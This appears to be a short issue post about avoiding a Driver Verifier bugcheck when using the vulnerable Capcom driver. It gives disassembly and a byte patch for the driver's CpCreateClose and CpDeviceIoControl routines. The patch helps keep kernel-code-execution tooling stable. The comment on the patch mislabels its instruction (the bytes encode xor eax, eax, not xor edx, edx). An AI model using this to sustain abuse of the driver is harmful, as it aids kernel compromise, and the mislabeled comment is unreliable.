This causes page fault bugcheck on DV enabled environment. (bugcheck 0x50)

# Mitigation

As the author says, we could directly patch the mapped image to avoid page faults.
We need to patch two functions, `CpCreateClose` and `CpDeviceIoControl`.

```asm
; Original disassembly of CpDeviceIoControl
fffff805`784b062b ff15dffcffff    call    qword ptr [Capcom+0x310 (fffff805`784b0310)]
fffff805`784b0631 8b4330          mov     eax,dword ptr [rbx+30h] ; rva is 0x631
fffff805`784b0634 4883c420        add     rsp,20h
fffff805`784b0638 5f              pop     rdi
fffff805`784b0639 5e              pop     rsi
fffff805`784b063a 5b              pop     rbx
fffff805`784b063b c3              ret
```

```asm
; Original disassembly of CpCreateClose
fffff805`784b0512 ff15f8fdffff    call    qword ptr [Capcom+0x310 (fffff805`784b0310)]
fffff805`784b0518 8b4330          mov     eax,dword ptr [rbx+30h] ; rva is 0x518
fffff805`784b051b 4883c420        add     rsp,20h
fffff805`784b051f 5b              pop     rbx
fffff805`784b0520 c3              ret
```

Simply patch with following shellcode:

```cpp
BYTE PatchShellcode[] = { 
    0x33, 0xC0, // xor edx, edx 
    0x90        // nop
};
```

# Problem

This mitigation will not work on either Windows 7 nor Windows 8, 8.1.
I do not see any reason to compatible with these versions so I don't care.

If you have any problems or better idea, feel like to discuss here.
Thank you.